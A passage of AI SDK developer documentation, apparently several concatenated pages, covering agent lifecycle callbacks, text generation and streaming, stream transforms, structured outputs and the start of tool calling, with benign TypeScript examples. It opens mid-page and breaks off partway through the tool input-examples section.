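For example, a per-call override in stream(), mirroring the constructor example above:
const result = await agent.stream({
  messages,
  // only for this call: force a text response after 5 steps
  prepareStep: async ({ stepNumber }) =>
    stepNumber > 5 ? { toolChoice: "none" } : {},
});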
Lifecycle Callbacks
Agents provide lifecycle callbacks for logging, observability, and custom telemetry. All callbacks can be defined in the constructor (agent-wide) or in stream() (per-call). When both are provided, both fire (constructor first):
const agent = new WorkflowAgent({
model: "anthropic/claude-sonnet-4-6",
experimental_onStart({ model, messages }) {
console.log("Agent started");
},
experimental_onStepStart({ stepNumber }) {
console.log(`Step ${stepNumber} starting`);
},
experimental_onToolExecutionStart({ toolCall }) {
console.log(`Calling tool: ${toolCall.toolName}`);
},
experimental_onToolExecutionEnd({ toolCall, result, error }) {
console.log(`Tool finished: ${toolCall.toolName}`);
},
onStepFinish({ usage, finishReason }) {
console.log("Step done:", { finishReason });
},
onFinish({ steps, totalUsage }) {
console.log(`Completed in ${steps.length} steps`);
},
});
Type Inference
Infer the UI message type for type-safe client components:
import { WorkflowAgent, InferWorkflowAgentUIMessage } from "@ai-sdk/workflow";
const myAgent = new WorkflowAgent({
// ... configuration
});
export type MyAgentUIMessage = InferWorkflowAgentUIMessage<typeof myAgent>;
Next Steps
- WorkflowAgent API Reference for detailed parameter documentation
- WorkflowChatTransport API Reference for stream reconnection options
- Building Agents for the in-memory `ToolLoopAgent` alternative
- Loop Control for advanced stop conditions
title: Agents description: An overview of building agents with the AI SDK.
Agents
The following section shows you how to build agents with the AI SDK - systems where large language models (LLMs) use tools in a loop to accomplish tasks.
<IndexCards cards={[ { title: 'Overview', description: 'Learn what agents are and why to use the ToolLoopAgent.', href: '/docs/agents/overview', }, { title: 'Building Agents', description: 'Complete guide to creating agents with the ToolLoopAgent.', href: '/docs/agents/building-agents', }, { title: 'Workflow Patterns', description: 'Structured patterns using core functions for complex workflows.', href: '/docs/agents/workflows', }, { title: 'Loop Control', description: 'Advanced execution control with stopWhen and prepareStep.', href: '/docs/agents/loop-control', }, { title: 'Configuring Call Options', description: 'Pass type-safe runtime inputs to dynamically configure agent behavior.', href: '/docs/agents/configuring-call-options', }, { title: 'Subagents', description: 'Delegate context-heavy tasks to specialized subagents while keeping the main agent focused.', href: '/docs/agents/subagents', }, { title: 'WorkflowAgent', description: 'Build durable, resumable agents with @ai-sdk/workflow for Vercel Workflows.', href: '/docs/agents/workflow-agent', }, ]} />
title: Overview description: An overview of AI SDK Core.
AI SDK Core
Large Language Models (LLMs) are advanced programs that can understand, create, and engage with human language on a large scale. They are trained on vast amounts of written material to recognize patterns in language and predict what might come next in a given piece of text.
AI SDK Core simplifies working with LLMs by offering a standardized way of integrating them into your app - so you can focus on building great AI applications for your users, not waste time on technical details.
For example, here’s how you can generate text with various models using the AI SDK:
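import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const { text } = await generateText({
  model: __MODEL__,
  prompt: 'What is love?', // illustrative prompt
});

console.log(text);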
AI SDK Core Functions
AI SDK Core has various functions designed for text generation, structured data generation, and tool usage. These functions take a standardized approach to setting up prompts and settings, making it easier to work with different models.
- `generateText`: Generates text and tool calls. This function is ideal for non-interactive use cases such as automation tasks where you need to write text (e.g. drafting email or summarizing web pages) and for agents that use tools.
- `streamText`: Streams text and tool calls. You can use the `streamText` function for interactive use cases such as chat bots and content streaming.
Both generateText and streamText support structured output via the output property (e.g. Output.object(), Output.array()), allowing you to generate typed, schema-validated data for information extraction, synthetic data generation, classification tasks, and streaming generated UIs.
API Reference
Please check out the AI SDK Core API Reference for more details on each function.
title: Generating Text description: Learn how to generate text with the AI SDK.
Generating and Streaming Text
Large language models (LLMs) can generate text in response to a prompt, which can contain instructions and information to process. For example, you can ask a model to come up with a recipe, draft an email, or summarize a document.
The AI SDK Core provides two functions to generate text and stream it from LLMs:
- `generateText`: Generates text for a given prompt and model.
- `streamText`: Streams text from a given prompt and model.
Advanced LLM features such as tool calling and structured data generation are built on top of text generation.
generateText
You can generate text using the generateText function. This function is ideal for non-interactive use cases where you need to write text (e.g. drafting email or summarizing web pages) and for agents that use tools.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const { text } = await generateText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can use more advanced prompts to generate text with more complex instructions and content:
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const { text } = await generateText({
model: __MODEL__,
system:
'You are a professional writer. ' +
'You write simple, clear, and concise content.',
prompt: `Summarize the following article in 3-5 sentences: ${article}`,
});
The result object of generateText contains several promises that resolve when all required data is available:
- `result.content`: The content that was generated in the last step.
- `result.text`: The generated text.
- `result.reasoning`: The full reasoning that the model has generated in the last step.
- `result.reasoningText`: The reasoning text of the model (only available for some models).
- `result.files`: The files that were generated in the last step.
- `result.sources`: Sources that have been used as references in the last step (only available for some models).
- `result.toolCalls`: The tool calls that were made in the last step.
- `result.toolResults`: The results of the tool calls from the last step.
- `result.finishReason`: The reason the model finished generating text.
- `result.rawFinishReason`: The raw reason why the generation finished (from the provider).
- `result.usage`: The usage of the model during the final step of text generation.
- `result.totalUsage`: The total usage across all steps (for multi-step generations).
- `result.warnings`: Warnings from the model provider (e.g. unsupported settings).
- `result.request`: Additional request information.
- `result.response`: Additional response information, including response messages and body.
- `result.providerMetadata`: Additional provider-specific metadata.
- `result.steps`: Details for all steps, useful for getting information about intermediate steps.
- `result.output`: The generated structured output using the `output` specification.
Accessing response headers & body
Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.
You can access the raw response headers and body using the response property:
import { generateText } from 'ai';
const result = await generateText({
// ...
});
console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));
onFinish callback
When using generateText, you can provide an onFinish callback that is triggered after the last step is finished (see the API Reference).
It contains the text, usage information, finish reason, messages, steps, total usage, and more:
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
onFinish({ text, finishReason, usage, response, steps, totalUsage }) {
// your own logic, e.g. for saving the chat history or recording usage
const messages = response.messages; // messages that were generated
},
});
Lifecycle callbacks (experimental)
generateText provides several experimental lifecycle callbacks that let you hook into different phases of the generation process.
These are useful for logging, observability, debugging, and custom telemetry.
Errors thrown inside these callbacks are silently caught and do not break the generation flow.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
prompt: 'What is the weather in San Francisco?',
tools: {
// ... your tools
},
experimental_onStart({ model, settings, functionId }) {
console.log('Generation started', { model, functionId });
},
experimental_onStepStart({ stepNumber, model, promptMessages }) {
console.log(`Step ${stepNumber} starting`, { model: model.modelId });
},
experimental_onToolExecutionStart({ toolName, toolCallId, input }) {
console.log(`Tool call starting: ${toolName}`, { toolCallId });
},
experimental_onToolExecutionEnd({ toolName, durationMs, error }) {
console.log(`Tool call finished: ${toolName} (${durationMs}ms)`, {
success: !error,
});
},
onStepFinish({ stepNumber, finishReason, usage }) {
console.log(`Step ${stepNumber} finished`, { finishReason, usage });
},
});
The available lifecycle callbacks are:
- `experimental_onStart`: Called once when the `generateText` operation begins, before any LLM calls. Receives model info, prompt, settings, and `runtimeContext`.
- `experimental_onStepStart`: Called before each step (LLM call). Receives the step number, model, prompt messages being sent, tools, and prior steps.
- `experimental_onToolExecutionStart`: Called right before a tool's `execute` function runs. Receives the tool name, call ID, and input.
- `experimental_onToolExecutionEnd`: Called right after a tool's `execute` function completes or errors. Receives the tool name, call ID, input, output (or undefined on error), error (or undefined on success), and `durationMs`.
- `onStepFinish`: Called after each step finishes. Now also includes `stepNumber` (zero-based index of the completed step).
streamText
Depending on your model and prompt, it can take a large language model (LLM) up to a minute to finish generating its response. This delay can be unacceptable for interactive use cases such as chatbots or real-time applications, where users expect immediate responses.
AI SDK Core provides the streamText function which simplifies streaming text from LLMs:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
});
// example: use textStream as an async iterable
for await (const textPart of result.textStream) {
console.log(textPart);
}
You can use streamText on its own or in combination with AI SDK UI and AI SDK RSC.
The result object contains several helper functions to make the integration into AI SDK UI easier:
- `result.toUIMessageStreamResponse()`: Creates a UI Message stream HTTP response (with tool calls etc.) that can be used in a Next.js App Router API route.
- `result.pipeUIMessageStreamToResponse()`: Writes UI Message stream delta output to a Node.js response-like object.
- `result.toTextStreamResponse()`: Creates a simple text stream HTTP response.
- `result.pipeTextStreamToResponse()`: Writes text delta output to a Node.js response-like object.
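For example, a minimal sketch of a Next.js App Router route handler that streams UI messages to the client (assuming the client sends a { messages } body, as useChat does by default):
import { convertToModelMessages, streamText, type UIMessage } from 'ai';

export async function POST(request: Request) {
  const { messages }: { messages: UIMessage[] } = await request.json();

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
  });

  // create a UI Message stream HTTP response (with tool calls etc.)
  return result.toUIMessageStreamResponse();
}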
The result object also provides several promises that resolve when the stream is finished:
- `result.content`: The content that was generated in the last step.
- `result.text`: The generated text.
- `result.reasoning`: The full reasoning that the model has generated.
- `result.reasoningText`: The reasoning text of the model (only available for some models).
- `result.files`: Files that have been generated by the model in the last step.
- `result.sources`: Sources that have been used as references in the last step (only available for some models).
- `result.toolCalls`: The tool calls that have been executed in the last step.
- `result.toolResults`: The tool results that have been generated in the last step.
- `result.finishReason`: The reason the model finished generating text.
- `result.rawFinishReason`: The raw reason why the generation finished (from the provider).
- `result.usage`: The usage of the model during the final step of text generation.
- `result.totalUsage`: The total usage across all steps (for multi-step generations).
- `result.warnings`: Warnings from the model provider (e.g. unsupported settings).
- `result.steps`: Details for all steps, useful for getting information about intermediate steps.
- `result.request`: Additional request information from the last step.
- `result.response`: Additional response information from the last step.
- `result.providerMetadata`: Additional provider-specific metadata from the last step.
onError callback
streamText immediately starts streaming to enable sending data without waiting for the model.
Errors become part of the stream and are not thrown to prevent e.g. servers from crashing.
To log errors, you can provide an onError callback that is triggered when an error occurs.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
onError({ error }) {
console.error(error); // your error logging logic here
},
});
onChunk callback
When using streamText, you can provide an onChunk callback that is triggered for each chunk of the stream.
It receives the following chunk types:
- `text`
- `reasoning`
- `source`
- `tool-call`
- `tool-input-start`
- `tool-input-delta`
- `tool-result`
- `raw`
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
onChunk({ chunk }) {
// implement your own logic here, e.g.:
if (chunk.type === 'text') {
console.log(chunk.text);
}
},
});
onFinish callback
When using streamText, you can provide an onFinish callback that is triggered when the stream is finished (see the API Reference).
It contains the text, usage information, finish reason, messages, steps, total usage, and more:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
onFinish({ text, finishReason, usage, response, steps, totalUsage }) {
// your own logic, e.g. for saving the chat history or recording usage
const messages = response.messages; // messages that were generated
},
});
Lifecycle callbacks (experimental)
streamText provides several experimental lifecycle callbacks that let you hook into different phases of the streaming process.
These are useful for logging, observability, debugging, and custom telemetry.
Errors thrown inside these callbacks are silently caught and do not break the streaming flow.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'What is the weather in San Francisco?',
tools: {
// ... your tools
},
experimental_onStart({ model, system, prompt, messages }) {
console.log('Streaming started', { model, prompt });
},
experimental_onStepStart({ stepNumber, model, messages }) {
console.log(`Step ${stepNumber} starting`, { model: model.modelId });
},
experimental_onToolExecutionStart({ toolCall }) {
console.log(`Tool call starting: ${toolCall.toolName}`, {
toolCallId: toolCall.toolCallId,
});
},
experimental_onToolExecutionEnd({ toolCall, durationMs, success, error }) {
console.log(`Tool call finished: ${toolCall.toolName} (${durationMs}ms)`, {
success,
});
},
onStepFinish({ finishReason, usage }) {
console.log('Step finished', { finishReason, usage });
},
});
The available lifecycle callbacks are:
- `experimental_onStart`: Called once when the `streamText` operation begins, before any LLM calls. Receives model info, prompt, settings, and `runtimeContext`.
- `experimental_onStepStart`: Called before each step (LLM call). Receives the step number, model, messages being sent, tools, and prior steps.
- `experimental_onToolExecutionStart`: Called right before a tool's `execute` function runs. Receives the tool call object, messages, and the tool-specific context for that call.
- `experimental_onToolExecutionEnd`: Called right after a tool's `execute` function completes or errors. Receives the tool call object, `durationMs`, and a discriminated union with `success`/`output` or `success`/`error`.
- `onStepFinish`: Called after each step finishes. Receives the finish reason, usage, and other step details.
fullStream property
You can read a stream with all events using the fullStream property.
This can be useful if you want to implement your own UI or handle the stream in a different way.
Here is an example of how to use the fullStream property:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const result = streamText({
model: __MODEL__,
tools: {
cityAttractions: {
inputSchema: z.object({ city: z.string() }),
execute: async ({ city }) => ({
attractions: ['attraction1', 'attraction2', 'attraction3'],
}),
},
},
prompt: 'What are some San Francisco tourist attractions?',
});
for await (const part of result.fullStream) {
switch (part.type) {
case 'start': {
// handle start of stream
break;
}
case 'start-step': {
// handle start of step
break;
}
case 'text-start': {
// handle text start
break;
}
case 'text-delta': {
// handle text delta here
break;
}
case 'text-end': {
// handle text end
break;
}
case 'reasoning-start': {
// handle reasoning start
break;
}
case 'reasoning-delta': {
// handle reasoning delta here
break;
}
case 'reasoning-end': {
// handle reasoning end
break;
}
case 'source': {
// handle source here
break;
}
case 'file': {
// handle file here
break;
}
case 'tool-call': {
switch (part.toolName) {
case 'cityAttractions': {
// handle tool call here
break;
}
}
break;
}
case 'tool-input-start': {
// handle tool input start
break;
}
case 'tool-input-delta': {
// handle tool input delta
break;
}
case 'tool-input-end': {
// handle tool input end
break;
}
case 'tool-result': {
switch (part.toolName) {
case 'cityAttractions': {
// handle tool result here
break;
}
}
break;
}
case 'tool-error': {
// handle tool error
break;
}
case 'finish-step': {
// handle finish step
break;
}
case 'finish': {
// handle finish here
break;
}
case 'error': {
// handle error here
break;
}
case 'raw': {
// handle raw value
break;
}
}
}
Stream transformation
You can use the experimental_transform option to transform the stream.
This is useful for e.g. filtering, changing, or smoothing the text stream.
The transformations are applied before the callbacks are invoked and the promises are resolved.
If you e.g. have a transformation that changes all text to uppercase, the onFinish callback will receive the transformed text.
Smoothing streams
The AI SDK Core provides a smoothStream function that
can be used to smooth out text and reasoning streaming.
import { smoothStream, streamText } from 'ai';
const result = streamText({
model,
prompt,
experimental_transform: smoothStream(),
});
Custom transformations
You can also implement your own custom transformations. The transformation function receives the tools that are available to the model, and returns a function that is used to transform the stream. Tools can either be generic or limited to the tools that you are using.
Here is an example of how to implement a custom transformation that converts all text to uppercase:
import { streamText, type TextStreamPart, type ToolSet } from 'ai';
const upperCaseTransform =
<TOOLS extends ToolSet>() =>
(options: { tools: TOOLS; stopStream: () => void }) =>
new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
transform(chunk, controller) {
controller.enqueue(
// for text-delta chunks, convert the text to uppercase:
chunk.type === 'text-delta'
? { ...chunk, text: chunk.text.toUpperCase() }
: chunk,
);
},
});
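You can then pass the transform to streamText via experimental_transform:
const result = streamText({
  model,
  prompt,
  experimental_transform: upperCaseTransform(),
});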
You can also stop the stream using the stopStream function.
This is e.g. useful if you want to stop the stream when model guardrails are violated, e.g. by generating inappropriate content.
When you invoke stopStream, it is important to simulate the finish-step and finish events to guarantee that a well-formed stream is returned
and all callbacks are invoked.
import { streamText, type TextStreamPart, type ToolSet } from 'ai';
const stopWordTransform =
<TOOLS extends ToolSet>() =>
({ stopStream }: { stopStream: () => void }) =>
new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
// note: this is a simplified transformation for testing;
// in a real-world version there would need to be more
// stream buffering and scanning to correctly emit prior text
// and to detect all STOP occurrences.
transform(chunk, controller) {
if (chunk.type !== 'text-delta') {
controller.enqueue(chunk);
return;
}
if (chunk.text.includes('STOP')) {
// stop the stream
stopStream();
// simulate the finish-step event
controller.enqueue({
type: 'finish-step',
finishReason: 'stop',
rawFinishReason: 'stop',
usage: {
completionTokens: NaN,
promptTokens: NaN,
totalTokens: NaN,
},
response: {
id: 'response-id',
modelId: 'mock-model-id',
timestamp: new Date(0),
},
providerMetadata: undefined,
});
// simulate the finish event
controller.enqueue({
type: 'finish',
finishReason: 'stop',
rawFinishReason: 'stop',
totalUsage: {
completionTokens: NaN,
promptTokens: NaN,
totalTokens: NaN,
},
});
return;
}
controller.enqueue(chunk);
},
});
Multiple transformations
You can also provide multiple transformations. They are applied in the order they are provided.
const result = streamText({
model,
prompt,
experimental_transform: [firstTransform, secondTransform],
});
Sources
Some providers such as Perplexity and Google include sources in the response.
Currently sources are limited to web pages that ground the response.
You can access them using the sources property of the result.
Each url source contains the following properties:
- `id`: The ID of the source.
- `url`: The URL of the source.
- `title`: The optional title of the source.
- `providerMetadata`: Provider metadata for the source.
When you use generateText, you can access the sources using the sources property:
import { generateText } from 'ai';
import { google } from '@ai-sdk/google';

const result = await generateText({
model: 'google/gemini-2.5-flash',
tools: {
google_search: google.tools.googleSearch({}),
},
prompt: 'List the top 5 San Francisco news from the past week.',
});
for (const source of result.sources) {
if (source.sourceType === 'url') {
console.log('ID:', source.id);
console.log('Title:', source.title);
console.log('URL:', source.url);
console.log('Provider metadata:', source.providerMetadata);
console.log();
}
}
When you use streamText, you can access the sources using the fullStream property:
import { streamText } from 'ai';
import { google } from '@ai-sdk/google';

const result = streamText({
model: 'google/gemini-2.5-flash',
tools: {
google_search: google.tools.googleSearch({}),
},
prompt: 'List the top 5 San Francisco news from the past week.',
});
for await (const part of result.fullStream) {
if (part.type === 'source' && part.sourceType === 'url') {
console.log('ID:', part.id);
console.log('Title:', part.title);
console.log('URL:', part.url);
console.log('Provider metadata:', part.providerMetadata);
console.log();
}
}
The sources are also available in the result.sources promise.
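For example:
// resolves once the stream has finished
const sources = await result.sources;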
Examples
You can see generateText and streamText in action using various frameworks in the following examples:
generateText
<ExampleLinks examples={[ { title: 'Learn to generate text in Node.js', link: '/examples/node/generating-text/generate-text', }, { title: 'Learn to generate text in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/generating-text', }, { title: 'Learn to generate text in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/generating-text', }, ]} />
streamText
<ExampleLinks examples={[ { title: 'Learn to stream text in Node.js', link: '/examples/node/generating-text/stream-text', }, { title: 'Learn to stream text in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/streaming-text-generation', }, { title: 'Learn to stream text in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/streaming-text-generation', }, ]} />
title: Generating Structured Data description: Learn how to generate structured data with the AI SDK.
Generating Structured Data
While text generation can be useful, your use case will likely call for generating structured data. For example, you might want to extract information from text, classify data, or generate synthetic data.
Many language models are capable of generating structured data, often defined as using "JSON modes" or "tools". However, you need to manually provide schemas and then validate the generated data as LLMs can produce incorrect or incomplete structured data.
The AI SDK standardises structured object generation across model providers
using the output property on generateText
and streamText.
You can use Zod schemas, Valibot, or JSON schemas to specify the shape of the data that you want,
and the AI model will generate data that conforms to that structure.
Generating Structured Outputs
Use generateText with Output.object() to generate structured data from a prompt.
The schema is also used to validate the generated data, ensuring type safety and correctness.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { output } = await generateText({
model: __MODEL__,
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
Accessing response headers & body
Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.
You can access the raw response headers and body using the response property:
import { generateText, Output } from 'ai';
const result = await generateText({
// ...
output: Output.object({ schema }),
});
console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));
Stream Structured Outputs
Given the added complexity of returning structured data, model response time can be unacceptable for your interactive use case.
With streamText and output, you can stream the model's structured response as it is generated.
import { streamText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { partialOutputStream } = streamText({
model: __MODEL__,
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
// use partialOutputStream as an async iterable
for await (const partialObject of partialOutputStream) {
console.log(partialObject);
}
You can consume the structured output on the client with the useObject hook.
Error Handling in Streams
streamText starts streaming immediately. When errors occur during streaming, they become part of the stream rather than thrown exceptions (to prevent stream crashes).
To handle errors, provide an onError callback:
import { streamText, Output } from 'ai';
const result = streamText({
// ...
output: Output.object({ schema }),
onError({ error }) {
console.error(error); // log to your error tracking service
},
});
For non-streaming error handling with generateText, see the Error Handling section below.
Output Types
The AI SDK supports multiple ways of specifying the expected structure of generated data via the Output object. You can select from various strategies for structured/text generation and validation.
Output.text()
Use Output.text() to generate plain text from a model. This option doesn't enforce any schema on the result: you simply receive the model's text as a string. This is the default behavior when no output is specified.
import { generateText, Output } from 'ai';
const { output } = await generateText({
// ...
output: Output.text(),
prompt: 'Tell me a joke.',
});
// output will be a string (the joke)
Output.object()
Use Output.object({ schema }) to generate a structured object based on a schema (for example, a Zod schema). The output is type-validated to ensure the returned result matches the schema.
import { generateText, Output } from 'ai';
import { z } from 'zod';
const { output } = await generateText({
// ...
output: Output.object({
schema: z.object({
name: z.string(),
age: z.number().nullable(),
labels: z.array(z.string()),
}),
}),
prompt: 'Generate information for a test user.',
});
// output will be an object matching the schema above
Output.array()
Use Output.array({ element }) to specify that you expect an array of typed objects from the model, where each element should conform to a schema (defined in the element property).
import { generateText, Output } from 'ai';
import { z } from 'zod';
const { output } = await generateText({
// ...
output: Output.array({
element: z.object({
location: z.string(),
temperature: z.number(),
condition: z.string(),
}),
}),
prompt: 'List the weather for San Francisco and Paris.',
});
// output will be an array of objects like:
// [
// { location: 'San Francisco', temperature: 70, condition: 'Sunny' },
// { location: 'Paris', temperature: 65, condition: 'Cloudy' },
// ]
When streaming arrays with streamText, you can use elementStream to receive each completed element as it is generated:
import { streamText, Output } from 'ai';
import { z } from 'zod';
const { elementStream } = streamText({
// ...
output: Output.array({
element: z.object({
name: z.string(),
class: z.string(),
description: z.string(),
}),
}),
prompt: 'Generate 3 hero descriptions for a fantasy role playing game.',
});
for await (const hero of elementStream) {
console.log(hero); // Each hero is complete and validated
}
Output.choice()
Use Output.choice({ options }) when you expect the model to choose from a specific set of string options, such as for classification or fixed-enum answers.
import { generateText, Output } from 'ai';
const { output } = await generateText({
// ...
output: Output.choice({
options: ['sunny', 'rainy', 'snowy'],
}),
prompt: 'Is the weather sunny, rainy, or snowy today?',
});
// output will be one of: 'sunny', 'rainy', or 'snowy'
You can provide any set of string options, and the output will always be a single string value that matches one of the specified options. The AI SDK validates that the result matches one of your options, and will throw if the model returns something invalid.
This is especially useful for making classification-style generations or forcing valid values for API compatibility.
Output.json()
Use Output.json() when you want to generate and parse unstructured JSON values from the model, without enforcing a specific schema. This is useful if you want to capture arbitrary objects, flexible structures, or when you want to rely on the model's natural output rather than rigid validation.
import { generateText, Output } from 'ai';
const { output } = await generateText({
// ...
output: Output.json(),
prompt:
'For each city, return the current temperature and weather condition as a JSON object.',
});
// output could be any valid JSON, for example:
// {
// "San Francisco": { "temperature": 70, "condition": "Sunny" },
// "Paris": { "temperature": 65, "condition": "Cloudy" }
// }
With Output.json, the AI SDK only checks that the response is valid JSON; it doesn't validate the structure or types of the values. If you need schema validation, use the .object or .array outputs instead.
For more advanced validation or different structures, see the Output API reference.
Generating Structured Outputs with Tools
One of the key advantages of using structured output with generateText and streamText is the ability to combine it with tool calling.
import { generateText, Output, tool, isStepCount } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { output } = await generateText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather for a location',
inputSchema: z.object({ location: z.string() }),
execute: async ({ location }) => {
// fetch weather data
return { temperature: 72, condition: 'sunny' };
},
}),
},
output: Output.object({
schema: z.object({
summary: z.string(),
recommendation: z.string(),
}),
}),
stopWhen: isStepCount(5),
prompt: 'What should I wear in San Francisco today?',
});
Property Descriptions
You can add .describe("...") to individual schema properties to give the model hints about what each property is for. This helps improve the quality and accuracy of generated structured data:
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { output } = await generateText({
model: __MODEL__,
output: Output.object({
schema: z.object({
name: z.string().describe('The name of the recipe'),
ingredients: z
.array(
z.object({
name: z.string(),
amount: z
.string()
.describe('The amount of the ingredient (grams or ml)'),
}),
)
.describe('List of ingredients with amounts'),
steps: z.array(z.string()).describe('Step-by-step cooking instructions'),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
Property descriptions are particularly useful for:
- Clarifying ambiguous property names
- Specifying expected formats or conventions
- Providing context for complex nested structures
Output Name and Description
You can optionally specify a name and description for the output. These are used by some providers for additional LLM guidance, e.g. via tool or schema name.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { output } = await generateText({
model: __MODEL__,
output: Output.object({
name: 'Recipe',
description: 'A recipe for a dish.',
schema: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This works with all output types that support structured generation:
- `Output.object({ name, description, schema })`
- `Output.array({ name, description, element })`
- `Output.choice({ name, description, options })`
- `Output.json({ name, description })`
Accessing Reasoning
You can access the reasoning used by the language model to generate the object via the reasoning property on the result. This property contains a string with the model's thought process, if available.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const result = await generateText({
model: __MODEL__, // must be a reasoning model
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({
name: z.string(),
amount: z.string(),
}),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
console.log(result.reasoningText);
Error Handling
When generateText with structured output cannot generate a valid object, it throws an AI_NoObjectGeneratedError.
This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated a response that could not be parsed.
- The model generated a response that could not be validated against the schema.
The error preserves the following information to help you log the issue:
- `text`: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode.
- `response`: Metadata about the language model response, including response id, timestamp, and model.
- `usage`: Request token usage.
- `cause`: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling.
import { generateText, Output, NoObjectGeneratedError } from 'ai';
try {
await generateText({
model,
output: Output.object({ schema }),
prompt,
});
} catch (error) {
if (NoObjectGeneratedError.isInstance(error)) {
console.log('NoObjectGeneratedError');
console.log('Cause:', error.cause);
console.log('Text:', error.text);
console.log('Response:', error.response);
console.log('Usage:', error.usage);
}
}
More Examples
You can see structured output generation in action using various frameworks in the following examples:
generateText with Output
<ExampleLinks examples={[ { title: 'Learn to generate structured data in Node.js', link: '/examples/node/generating-structured-data/generate-object', }, { title: 'Learn to generate structured data in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/generating-object', }, { title: 'Learn to generate structured data in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/generating-object', }, ]} />
streamText with Output
<ExampleLinks examples={[ { title: 'Learn to stream structured data in Node.js', link: '/examples/node/streaming-structured-data/stream-object', }, { title: 'Learn to stream structured data in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/streaming-object-generation', }, { title: 'Learn to stream structured data in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/streaming-object-generation', }, ]} />
title: Tool Calling description: Learn about tool calling and multi-step calls (using stopWhen) with AI SDK Core.
Tool Calling
As covered under Foundations, tools are objects that can be called by the model to perform a specific task. AI SDK Core tools contain several core elements:
- `description`: An optional description of the tool that can influence when the tool is picked.
- `inputSchema`: A Zod schema or a JSON schema that defines the input parameters. The schema is consumed by the LLM, and also used to validate the LLM tool calls.
- `execute`: An optional async function that is called with the inputs from the tool call. It produces a value of type `RESULT` (generic type). It is optional because you might want to forward tool calls to the client or to a queue instead of executing them in the same process.
- `strict`: (optional, boolean) Enables strict tool calling when supported by the provider.
The tools parameter of generateText and streamText is an object that has the tool names as keys and the tools as values:
import { z } from 'zod';
import { generateText, tool, isStepCount } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
stopWhen: isStepCount(5),
prompt: 'What is the weather in San Francisco?',
});
Tool calling is not restricted to only text generation. You can also use it to render user interfaces (Generative UI).
Strict Mode
When enabled, language model providers that support strict tool calling will only generate tool calls that are valid according to your defined inputSchema.
This increases the reliability of tool calling.
However, not all schemas may be supported in strict mode, and what is supported depends on the specific provider.
By default, strict mode is disabled. You can enable it per-tool by setting strict: true:
tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string(),
}),
strict: true, // Enable strict validation for this tool
execute: async ({ location }) => ({
// ...
}),
});
Input Examples
You can specify example inputs for your tools to help guide the model on how input data should be structured. When supported by providers, input examples can help when JSON schema itself does not fully specify the intended usage or when there are optional values.
tool({
description: 'Get the weather in a location',
inputSchema: z.object({
